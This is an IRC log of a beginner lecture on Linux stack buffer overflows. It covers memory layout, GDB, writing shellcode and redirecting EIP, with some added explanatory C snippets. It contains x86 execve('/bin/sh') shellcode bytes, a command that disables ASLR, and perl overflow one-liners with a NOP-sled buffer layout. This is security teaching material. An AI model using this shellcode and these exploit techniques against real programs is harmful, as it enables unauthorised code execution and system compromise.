May 07 21:12:04 nnp The focus of these lectures will be on finding and
May 07 21:12:04 nnp exploiting vulnerabilities which can cause a security risk
May 07 21:12:33 nnp The aim of the lectures is to bring a software exploitation newbie to the point where they can confidently discover and exploit new vulnerabilities and
May 07 21:12:39 nnp also have the foundation of knowledge to continue with more advanced
May 07 21:12:48 nnp techniques.
May 07 21:13:07 nnp The first few lectures are going to be linux and open source specific. Once everyone is confident in these areas we'll then move on to exploiting closed source and MS Windows based software.
May 07 21:13:21 nnp The aim of this first lecture is to get everyone on a common level of knowledge. We will be covering ....
May 07 21:13:26 nnp 1) Linux memory structures
May 07 21:13:30 nnp 2) Classic buffer overflows
May 07 21:13:35 nnp 3) Basics of ShellCoding
May 07 21:13:40 nnp 4) An introduction to debugging with GDB
May 07 21:13:47 nnp 1.1 Linux Memory Structures
May 07 21:14:21 nnp Before we can begin exploiting applications we need a basic knowledge of how they appear in memory. As many of you may know, programs have several different and distinct sections. These are the stack, heap, bss, data and code. Each of these sections has a specific use and all have different properties.
May 07 21:14:33 nnp Code: Contains the code of the program (duh! ;) ). It is read only
May 07 21:14:35 * Cyph3r (opera@bu-97721158.karoo.kcom.com) has joined #lecture
May 07 21:14:37 nnp Data: The data section contains initialised global variables
May 07 21:14:43 nnp BSS: The bss section contains uninitialised global variables
May 07 21:14:49 nnp Heap: Used to store dynamically allocated variables (e.g via malloc() in
May 07 21:14:55 nnp C or new in C++)
May 07 21:15:14 nnp Stack: Used to store local variables, function arguments and data used in directing the flow of the application (it is here we will be focusing our attention for now)
May 07 21:15:38 nnp The addresses available to your program start at 0x00000000 and grow towards a maximum e.g 0xbfffffff.
May 07 21:15:58 nnp The heap grows from lower addresses towards higher ones and the stack starts at high memory addresses and grows downwards. It's very important to remember this and it can be quite confusing at first
May 07 21:16:18 nnp For example. To make space for 8 bytes of local variables (i.e make the stack bigger) the instruction would look like
May 07 21:16:25 nnp sub $0x8,%esp
May 07 21:16:30 nnp not add $0x8, %esp as you might expect.
May 07 21:16:51 nnp it looks something like this ......
May 07 21:17:07 nnp 0xffffffff ---stack -----> <----Unused memory -----> <-----Heap---- 0x00000000
May 07 21:17:31 nnp One other source of confusion can be in what direction variables are put onto the stack. e.g if you have space reserved for a string of size 0x4 at 0xbffff484 it would start at 0xbffff484 and finish at 0xbffff487 not 0xbffff481.
May 07 21:17:50 nnp i.e they still start at low and go to high even though the stack is growing in the opposite direction. Why is this good for us?
May 07 21:18:18 nnp Well if we can make the string grow beyond the space we have reserved for it we will be overwriting and controlling previously stored variables as opposed to unused memory.
May 07 21:18:26 * nnp sets mode -m #lecture
May 07 21:18:30 nnp any questions so far?
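A rough sketch of the layout nnp describes, for anyone who wants to see it on their own box. Nothing here is from the lecture files: the function names are made up for illustration, and `__attribute__((noinline))` assumes GCC or Clang. The exact addresses printed will differ per system, so only the two general claims are checked: bytes inside a buffer run from low to high, and a callee's locals sit on one side of the caller's.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int initialised_global = 42;   /* lives in the data section */
int uninitialised_global;      /* lives in the bss section */

/* Hypothetical helper: reports where one of its own locals lives. */
__attribute__((noinline)) uintptr_t callee_local_addr(void)
{
    volatile char marker = 0;
    return (uintptr_t)&marker;
}

/* Returns -1 if the callee's local is at a lower address than ours
 * (stack grows down, as on x86), +1 otherwise. */
__attribute__((noinline)) int stack_direction(void)
{
    volatile char marker = 0;
    uintptr_t mine = (uintptr_t)&marker;
    uintptr_t theirs = callee_local_addr();
    return theirs < mine ? -1 : 1;
}

/* Bytes inside a buffer always run low to high: last minus first. */
ptrdiff_t buffer_span(void)
{
    char name[4] = {0};
    return &name[3] - &name[0];
}

/* Print one sample address from each section. */
void print_layout(void)
{
    int local = 0;
    int *dynamic = malloc(sizeof *dynamic);
    assert(dynamic != NULL);
    printf("code  %p\n", (void *)(uintptr_t)&print_layout);
    printf("data  %p\n", (void *)&initialised_global);
    printf("bss   %p\n", (void *)&uninitialised_global);
    printf("heap  %p\n", (void *)dynamic);
    printf("stack %p\n", (void *)&local);
    free(dynamic);
}
```

Calling `print_layout()` from a `main` should show the stack address far above the heap address on a typical 32-bit linux box, and `stack_direction()` is expected to give -1 on x86.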
May 07 21:18:33 nnp am i going too slow?
May 07 21:18:36 nnp or too fast?
May 07 21:18:48 Cyph3r im getting you :)
May 07 21:19:01 nnp k...
May 07 21:19:08 * nnp sets mode +m #lecture
May 07 21:19:22 nnp So what do I mean by 'direct the flow of the application'? First of all let me refresh your memories on some basic asm.
May 07 21:19:45 nnp To keep track of what instruction the cpu should execute next a register called the EIP (Extended Instruction Pointer) is used....i.e if you can control the EIP then you can basically control what the cpu does
May 07 21:19:52 nnp This will be our
May 07 21:19:52 nnp aim.
May 07 21:20:21 nnp when you make a function call (e.g strcpy(buf1, buf2)) the flow of execution jumps into the strcpy function
May 07 21:20:34 nnp When this completes the cpu must know where to continue
May 07 21:20:44 nnp i.e the instruction directly after the call to strcpy
May 07 21:20:52 nnp How does this magic occur? What happens is this:
May 07 21:21:09 nnp The arguments to the function are pushed onto the stack (last argument first). Just before the execution jumps to the strcpy function the current value of the EIP register (the address of the instruction after the call) is push'ed onto the stack
May 07 21:21:18 nnp Then execution jumps to the strcpy function
May 07 21:21:30 nnp The stack then looks somewhat like this.....
May 07 21:21:35 nnp |src |
May 07 21:21:40 nnp |dest |
May 07 21:21:44 nnp |stored eip(return address) | <----ESP points here
May 07 21:22:12 nnp In strcpy the EBP is push'ed onto the stack. (The EBP (extended base pointer) stores a reference point used to address both the arguments and the local variables of the function in question, and every function will have its own base pointer.)
May 07 21:22:52 nnp The parameters are the start of the stack frame for that function. The stack frame contains the parameters, return information and the local variables.
May 07 21:23:14 nnp Every invocation of a C function creates a new stack frame on the stack.
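A small sketch for peeking at the stored return address and the frame base from inside a function. It leans on the GCC/Clang builtins `__builtin_return_address` and `__builtin_frame_address`, which is an assumption about your compiler; the function names are made up for illustration and are not part of the lecture code.

```c
#include <assert.h>
#include <stdio.h>

/* Returns the address execution will continue at once this function
 * returns, i.e. the stored eip for this invocation. */
__attribute__((noinline)) void *where_will_i_return(void)
{
    return __builtin_return_address(0);
}

/* Prints the frame base and the stored return address of this call. */
__attribute__((noinline)) void show_frame(void)
{
    printf("frame base:     %p\n", __builtin_frame_address(0));
    printf("return address: %p\n", __builtin_return_address(0));
}
```

Calling `show_frame()` from two different places in a program should print two different return addresses, since each call site has its own "instruction directly after the call".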
May 07 21:23:17 * R4d30N (admin@31F8B797.6C483A91.B71335E7.IP) has joined #lecture
May 07 21:23:31 nnp so once the function is entered the stack looks like this
May 07 21:23:40 nnp |src |
May 07 21:23:41 nnp |dest |
May 07 21:23:45 nnp |stored eip |
May 07 21:23:51 nnp |stored ebp | <----ESP points here
May 07 21:24:14 nnp When the strcpy function is done it pop's the stored values of EBP and EIP into the EBP and EIP registers respectively then execution continues.
May 07 21:24:23 * nnp sets mode -m #lecture
May 07 21:24:30 nnp everyone still with me?
May 07 21:24:37 nnp (sup r4d30n)
May 07 21:24:53 * ellipsis has quit (Quit: Art + Programming = Insanity)
May 07 21:24:57 R4d30N Aight man, said id stop by
May 07 21:24:58 nnp i'll take that as a yes
May 07 21:25:04 * nnp sets mode +m #lecture
May 07 21:25:17 nnp This could happen many times e.g the strcpy function could call some other function and so on.
May 07 21:25:28 nnp It's important to know how _exactly_ this happens and what the stack looks like so take a look at this code.
May 07 21:25:50 nnp http://silenthack.co.uk/lectures/lecture1/stackex.txt
May 07 21:26:15 nnp you can compile the above with
May 07 21:26:24 nnp gcc -g -static -o lec11 lec11.c
May 07 21:26:49 nnp Now to get a complete understanding we must look at the asm this C code compiles to. To do this we need a debugger and on linux the best available is GDB. It is free and is included on most distros by default.
May 07 21:26:57 * nnp sets mode -m #lecture
May 07 21:27:05 nnp in case anyone has any immediate questions
May 07 21:27:08 d03boy Question: Does each program get its own stack and heap and stuff? I'm used to working on motorola chips which dont have separate programs so you only have one stack.
May 07 21:27:13 nnp yes
May 07 21:27:20 nnp every program has its own sections
May 07 21:27:28 nnp completely independent of each other
May 07 21:27:45 nnp here is the disassembly of the above code
May 07 21:28:04 nnp http://silenthack.co.uk/lectures/lecture1/disasstackex.txt
May 07 21:28:27 nnp it also contains some comments to explain what's going on if your asm isn't so good
May 07 21:29:01 nnp i should also mention now, gdb uses at&t syntax by default. to make it use intel syntax issue the command
May 07 21:29:14 nnp set disassembly-flavor intel
May 07 21:29:40 nnp any questions on that code?
May 07 21:29:57 elmo_ Question: ``set disassembly-flavor intel`` do I do that as an argument while starting GDB or in a configuration file?
May 07 21:30:17 nnp you can do it in a config file or just issue it from the gdb command line
May 07 21:30:57 nnp ok...so on to shellcode
May 07 21:31:04 nnp or at least the basics anyway
May 07 21:31:28 nnp firstly if anyone is actually following this code and attempting it can i get you to check /proc/sys/kernel
May 07 21:31:38 nnp for anything that looks like randomize_va_space
May 07 21:31:51 nnp if you find it issue the following command echo 0 > /proc/sys/kernel/randomize_va_space
May 07 21:32:00 nnp that will turn off stack randomization for now
May 07 21:32:10 nnp after the lecture you can echo 1 back into that file
May 07 21:32:32 nnp So, this brings us to the first of our many attacks.
May 07 21:32:48 nnp You should see that if we can somehow change the stored eip to point to code that we control we can effectively do what we want
May 07 21:33:12 nnp e.g if we could store the instructions for system("/bin/sh") and then change the stored eip to point to them, instead of returning back into the main function a shell would be spawned. Cool, no?
May 07 21:33:31 nnp So for our first real example we will just redirect the eip to some arbitrary address just so you know im telling the truth ;)
May 07 21:33:41 nnp look at the following code.....
May 07 21:33:55 nnp http://silenthack.co.uk/lectures/lecture1/changeeip1.txt
May 07 21:34:32 nnp as you can see from the comments if you attempt to run the above program it seg faults
May 07 21:34:52 nnp why? well what the above code does is very simple. The int * i is a local variable
May 07 21:34:58 nnp and therefore stored on the stack
May 07 21:35:09 nnp So if you remember from earlier the stack would look like this
May 07 21:35:14 nnp |stored eip|
May 07 21:35:19 nnp |stored ebp|
May 07 21:35:23 nnp |int * i |
May 07 21:35:24 * Ch4r (Ch4r@bu-BBA3FD18.hsd1.ca.comcast.net) has joined #lecture
May 07 21:35:24 * ChanServ sets mode +q #lecture Ch4r
May 07 21:35:24 * ChanServ gives channel operator status to Ch4r
May 07 21:35:41 Ch4r whoa, lots of people here? The lecture isn't for another twenty minutes, right?
May 07 21:35:49 nnp so we give i its own address and then add 2 to it. Since i is a pointer to an int adding two has the effect of increasing the address stored in it by 8 bytes
May 07 21:35:56 nnp um, 9pm gmt?
May 07 21:35:57 nnp no?
May 07 21:36:02 Ch4r 9 PM GDT
May 07 21:36:04 Ch4r err
May 07 21:36:07 Ch4r 10 PM GDT
May 07 21:36:10 nnp ?
May 07 21:36:20 Ch4r 9 PM GMT, 10 PM GDT
May 07 21:36:36 nnp yea....its 21:36 gmt now
May 07 21:36:37 d03boy it started 37 minutes ago
May 07 21:36:54 nnp isnt it? fuck, is it?
May 07 21:37:09 elmo_ the time is right, go on
May 07 21:37:16 nnp right oh....
May 07 21:37:37 nnp What's 8 bytes above i in memory? You got it, the stored eip. We put 0 in the address pointed to by i (the stored eip) and when
May 07 21:37:47 nnp the program tries to use the stored eip to continue execution the value 0x0 is put into the eip
May 07 21:38:02 nnp This address isn't executable and so the program seg faults.
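The "add 2, move 8 bytes" step is just C pointer arithmetic, and it can be checked without touching the real stack. A minimal sketch, assuming nothing beyond standard C; the function name is made up for illustration and this is not the changeeip1 code from the lecture.

```c
#include <assert.h>
#include <stddef.h>

/* Number of bytes an int pointer moves when `steps` is added to it.
 * Works on a private array so no stored eip is harmed. */
size_t int_ptr_stride(size_t steps)
{
    int cells[8] = {0};
    assert(steps < 8);              /* stay inside the array */
    int *p = cells;
    int *q = p + steps;             /* advances by steps * sizeof(int) */
    return (size_t)((char *)q - (char *)p);
}
```

On a box where int is 4 bytes, `int_ptr_stride(2)` gives 8, which is the jump from i over the stored ebp to the stored eip in the diagram above.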
May 07 21:38:11 nnp Let's make this a little more useful. Let's spawn a shell.
May 07 21:38:20 nnp One way of doing this is using the execve system call.
May 07 21:38:30 nnp The problem with this is the cpu has no idea how to interpret C code
May 07 21:38:38 Ch4r nnp: sorry, to interrupt, but.. http://odin.gi.alaska.edu/lumm/GMTclock/ ;/
May 07 21:38:58 nnp The cpu needs machine instructions. To get these instructions we write the code we need executed in some asm variant and then get the opcodes using a program such as objdump or hexedit.
May 07 21:39:30 nnp ch4r: sorry about that
May 07 21:39:49 nnp So....we need code to execute the system call. Pretty simple really. Shellcode is basically a sequence of asm
May 07 21:39:59 nnp commands which usually spawn some form of shell (hence the name).
May 07 21:39:59 Cyph3r well im in UK and its 9:39...
May 07 21:40:21 nnp To do this we have to use system calls (as in calls to the system not the function system() from whatever C library you're using).
May 07 21:40:32 nnp You can get the numbers of the various system calls from
May 07 21:40:45 nnp execve() happens to be sys call 11. From the man page we can see that the execve call looks like this
May 07 21:41:15 nnp (oh, forgot to say, in case you dont know the linux kernel and most others identify sys calls via numbers not names)
May 07 21:41:21 nnp int execve (const char *filename, char *const argv [], char *const envp[]);
May 07 21:41:34 nnp argv is a null terminated list of the program's args (includes the program name) and envp can just be null for our purposes
May 07 21:41:41 nnp the filename is the program we want to execute
May 07 21:41:48 * elmo_ has quit (Ping timeout)
May 07 21:42:00 * elmo_ (elmo@bu-3E871720.res.east.verizon.net) has joined #lecture
May 07 21:42:01 nnp So we need to code a call to this in asm (nasm) and then get the instructions from this. Firstly, it usually helps to code up our shellcode in C so here is the 'classic' example
May 07 21:42:22 nnp http://silenthack.co.uk/lectures/lecture1/shell1.txt
May 07 21:42:50 nnp the nasm code follows it
May 07 21:43:07 nnp there are a few interesting things in there
May 07 21:43:30 nnp firstly the jmp at the start which goes to a call....
May 07 21:44:05 nnp the reason for this is that we need to be able to get the address of that buffer despite the fact we will have no idea (well, pretty much) where we will be on the stack
May 07 21:44:11 * nivek (Ze@EB549BD8.2202F3B8.D10BF7C7.IP) has joined #lecture
May 07 21:44:21 nnp the call instruction puts the return address (i.e where buf is) onto the stack
May 07 21:44:30 nnp this is then pop'ed off into esi
May 07 21:44:47 nnp this is used then as a base for the buffer
May 07 21:45:12 nnp We can assemble the previous code with the line
May 07 21:45:15 nnp nasm -f elf shell.asm
May 07 21:45:32 nnp To then obtain the shellcode from this we disassemble the object file using objdump -d shell.o
May 07 21:45:53 nnp this gives the output http://silenthack.co.uk/lectures/lecture1/objdump1.txt
May 07 21:46:16 elmo_ not found
May 07 21:46:17 nnp hmm, broken link...
May 07 21:46:18 nnp one sec
May 07 21:47:55 nnp k, try now
May 07 21:48:39 nnp The first column is the distance from the start in bytes. The second is the machine code bytes and the final column is what objdump thinks the corresponding asm instructions are
May 07 21:49:11 nnp What we will do is use the overflow to write the machine instructions onto the stack. By altering the stored eip to point to the start of these instructions they will then be executed
May 07 21:49:22 nnp There are problems with the above instructions though,
May 07 21:49:44 nnp you'll notice there are several sequences of 00 i.e null bytes. The problem with this is that the majority of basic buffer overflow vulnerabilities exist in string manipulation functions e.g strcpy.
May 07 21:50:03 nnp When strcpy encounters a null byte it will stop copying, as it should, because it thinks it's encountering the end of the string. We will first need to remove these by substituting the
May 07 21:50:08 nnp offending instructions with ones that don't generate null bytes
May 07 21:50:15 nnp this results in the following code....
May 07 21:50:43 nnp http://silenthack.co.uk/lectures/lecture1/shell2.txt
May 07 21:51:17 nnp hmm, there should be the following line at the start of that
May 07 21:51:20 nnp segment .text
May 07 21:51:32 nnp any questions regarding the optimisations in that?
May 07 21:52:15 nnp We use objdump -d on the object file from the above code and then just copy out the machine code bytes
May 07 21:52:22 nnp that results in the following shellcode
May 07 21:52:41 nnp \xeb\x1e\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x46\x55\x55\x55\x55\x4b\x4b\x4b\x4b
May 07 21:52:53 nnp I have added '\x' before each of the bytes so that C will interpret them as hex.
May 07 21:53:12 nnp Now we need to execute the same C program as before but this time instead of having the stored eip point to 0x0 it will point to our shellcode
May 07 21:53:35 nnp http://silenthack.co.uk/lectures/lecture1/shell3.txt
May 07 21:53:56 nnp and the result of running the above program is surprise, surprise...a shell :P
May 07 21:53:57 d03boy can you convert that to ascii for us so we know what it says?
May 07 21:54:28 nnp all that is is the result of me assembling http://silenthack.co.uk/lectures/lecture1/shell2.txt
May 07 21:54:31 nnp that code there
May 07 21:54:38 d03boy oh, gotcha
May 07 21:54:39 nnp with nasm -f elf shell.asm
May 07 21:54:49 nnp then running objdump -d shell.o
May 07 21:54:56 nnp and from that parsing out the machine code bytes
May 07 21:55:11 nnp (the second column)
May 07 21:55:27 nnp any other questions?
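The null byte problem is easy to check mechanically. A minimal sketch, not taken from shell1.txt or shell2.txt: the helper names are made up for illustration, and the two byte arrays are just the standard x86 encodings of `mov eax, 0xb` (which carries three 00 bytes) and the null-free pair `xor eax, eax` / `mov al, 0xb`.

```c
#include <assert.h>
#include <stddef.h>

/* Index of the first 0x00 byte in buf, or -1 if there is none. */
long first_nul(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            return (long)i;
    return -1;
}

/* How many of the len bytes a strcpy-style copy would carry across
 * before it hits a terminator. */
size_t bytes_strcpy_would_copy(const unsigned char *buf, size_t len)
{
    long nul = first_nul(buf, len);
    return nul < 0 ? len : (size_t)nul;
}

/* mov eax, 0xb: the 32-bit immediate drags in three null bytes */
const unsigned char mov_eax_11[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* xor eax, eax ; mov al, 0xb: same effect on eax, no null bytes */
const unsigned char xor_mov_al[] = { 0x31, 0xc0, 0xb0, 0x0b };
```

Running `first_nul` over the bytes copied out of objdump is a quick sanity check before trying to push them through strcpy.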
May 07 21:55:50 nnp ok...so....onto the final section for tonight.....basic buffer overflows
May 07 21:56:12 nnp We'll now explore how to gain control of the eip in an actual program
May 07 21:56:19 nnp Consider the following code
May 07 21:56:29 nnp char buf1[16];
May 07 21:56:31 nnp strcpy(buf1, argv[1]);
May 07 21:56:53 nnp the aim of this code is to copy the first user provided argument into buf1
May 07 21:57:05 nnp But what happens if the user inputs more than 16 bytes?
May 07 21:57:19 nnp Their input will overflow the end of buf1 and continue overwriting data previously stored on the stack.
May 07 21:57:28 nnp Try it out
May 07 21:57:34 nnp ./vuln1 `perl -e 'print "A"x16;'`
May 07 21:57:38 nnp That should run just fine
May 07 21:57:44 nnp whereas....
May 07 21:57:48 nnp ./vuln1 `perl -e 'print "A"x32;'`
May 07 21:57:54 nnp should seg fault
May 07 21:58:01 nnp The reason? We just filled the stored EIP with A's.
May 07 21:58:10 nnp The char A is 0x41 and so our program tried to return to 0x41414141
May 07 21:58:21 nnp again not a valid address for execution
May 07 21:58:51 nnp Now, we need to get a shell from this. We're going to do it first of all just using the command line.
May 07 21:59:08 nnp So we store the shellcode from earlier as an environment variable
May 07 21:59:16 nnp on linux this is done via the following command
May 07 21:59:22 nnp export SHELLCODE="SHELLCODE"
May 07 21:59:33 nnp where the quoted "SHELLCODE" is our shellcode from earlier
May 07 21:59:39 nnp We can then find the address of the shellcode using the following program.
May 07 22:00:21 nnp k...one sec....my connection just went nuts
May 07 22:00:36 nnp http://www.nostarch.com/extras/hacking/chap2/getenvaddr.c
May 07 22:00:59 nnp the above code is a simple C program that uses getenv to find the address of an environment variable
May 07 22:01:23 nnp There's something you should know about the address returned by this code though. It is specific to the environment of ./getenvaddr.
May 07 22:01:39 nnp Where the shellcode is in memory will change with respect to the length of the program name you are running
May 07 22:01:51 nnp For every extra character the program name has, the shellcode will be located 2 bytes lower in memory and vice versa.
May 07 22:02:18 nnp For example call our program vuln1 which is 5 characters shorter than getenvaddr.
May 07 22:02:29 nnp The shellcode will therefore be located 0xA bytes higher than the address returned by getenvaddr
May 07 22:02:44 nnp If you think about it this makes sense. The program name is also stored on the stack alongside the environment variables and will therefore have an effect on where they are located.
May 07 22:02:53 nnp Using this info we can exploit the program as follows
May 07 22:03:16 nnp if getenvaddr returns the address 0xAABBCCDD
May 07 22:03:28 nnp ./vuln1 `perl -e 'print "AAAAAAAAAAAAAAAAAAAA\xDD\xCC\xBB\xAA";'`
May 07 22:03:42 nnp The 4 bytes in the address must be reversed because the intel architecture uses little endian ordering
May 07 22:03:55 nnp This is normally taken care of for us by the compiler but since we are writing directly onto the stack it's up to us
May 07 22:04:10 nnp Any questions?
May 07 22:04:17 nnp (anyone even there :P )
May 07 22:04:28 d03boy ya
May 07 22:04:31 l3thal ya
May 07 22:04:36 qwertydawom no questions here
May 07 22:04:39 nnp k, onwards then
May 07 22:04:48 nnp how do we automate this kind of exploit?
May 07 22:05:03 nnp Well we can use the execl() call to execute this program and pass in a crafted buffer as the argument.
May 07 22:05:12 nnp For example, suppose the vulnerable call is as follows
May 07 22:05:17 nnp char buffer[512];
May 07 22:05:21 nnp strcpy(buffer, argv[1]);
May 07 22:05:26 nnp our crafted buffer would have to look something similar to the following
May 07 22:05:40 nnp [516 - strlen(shellcode) of padding][shellcode][return address (start of shellcode)]
May 07 22:05:58 * R4d30N has quit (Connection reset by peer)
May 07 22:06:16 nnp As you can see, the above buffer would require us to get the return address exactly right, this could be quite difficult due to differences in compilers and what not.
May 07 22:06:28 nnp We could brute force the address but on a remote system this would be less than ideal.
May 07 22:06:39 nnp We have methods to increase our chances of success though.
May 07 22:06:56 nnp One method is by using a NOP sled. A NOP is an asm instruction (\x90) that does nothing.
May 07 22:07:28 nnp It is primarily used to waste cpu cycles for timing purposes but for us we can use it as a sort of fudge factor.
May 07 22:07:53 nnp We put as many of these before the shellcode as we can fit (we also need other stuff so we can't fill it completely) and if we return anywhere within this sled the cpu will simply cycle
May 07 22:07:59 nnp through them till it encounters the start of our shellcode.
May 07 22:08:19 nnp We will also repeat the return address at the end of the buffer to ensure we overwrite the saved eip.
May 07 22:08:35 nnp Sometimes it is hard to predict where exactly the stored eip will be due to compiler optimizations and padding. So our final buffer will look something like this
May 07 22:08:41 nnp [200 or so NOPS][Shellcode][Repeated return address]
May 07 22:09:18 nnp We will craft this using the following C code (lifted from The Art of Exploitation by Jon Erickson which was in turn lifted from Smashing the Stack for Fun and Profit by aleph1)
May 07 22:09:23 nnp ;)
May 07 22:09:53 nnp http://silenthack.co.uk/lectures/lecture1/buffer.txt
May 07 22:10:21 nnp k, i'll give ye a minute or two to look at that
May 07 22:11:19 nnp k
May 07 22:11:56 nnp As a side note, it is vital that your return address be aligned on a 4 byte boundary (i.e ensure the offset into the array where you start writing is divisible by 4) otherwise the copies you write will be out of step with the stored eip and it will end up holding a garbled mix of bytes from two neighbouring copies
May 07 22:12:35 nnp One question many people have initially is regarding the sp() function above that returns the stack pointer for the current program and how this address could be used as the return address in the vulnerable program
May 07 22:12:54 nnp The answer is that most programs have a very similar stack structure. This combined with the fudge factor provided by the NOPs is usually enough to land us somewhere in the NOP sled.
May 07 22:13:26 nnp If it doesn't though you can simply pass an offset variable to the above program that will subtract this value from the address returned. This would be useful if the buffer we were overflowing was located further up the stack (lower in memory addresses) than our exploit buffer provided for.
May 07 22:13:55 nnp Well that pretty much concludes this lecture. The aim was to lay the ground work for more advanced and more interesting material. In the next lecture I will cover more advanced techniques.
May 07 22:14:10 nnp I would strongly recommend everyone have a read of aleph1's paper 'Smashing the Stack for Fun and Profit'.
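The little endian ordering and the 4 byte alignment rule from the lecture can both be seen with plain byte shuffling. A minimal sketch under stated assumptions: this is not the buffer.txt code, the function names are made up for illustration, and 0xAABBCCDD is only the placeholder address nnp used earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value least significant byte first, the way an
 * intel cpu lays it out in memory. */
void put_le32(unsigned char *out, uint32_t value)
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Fill buf from offset `start` onwards with repeated copies of value.
 * `start` must be divisible by 4 so every copy sits on a 4 byte
 * boundary. Returns how many whole copies were written. */
size_t fill_le32(unsigned char *buf, size_t len, size_t start, uint32_t value)
{
    assert(start % 4 == 0);
    size_t count = 0;
    for (size_t off = start; off + 4 <= len; off += 4) {
        put_le32(buf + off, value);
        count++;
    }
    return count;
}
```

With value 0xAABBCCDD the bytes land as DD CC BB AA, matching the \xDD\xCC\xBB\xAA in the perl one-liner. If `start` were not a multiple of 4, a 4 byte slot on the stack would pick up the tail of one copy and the head of the next.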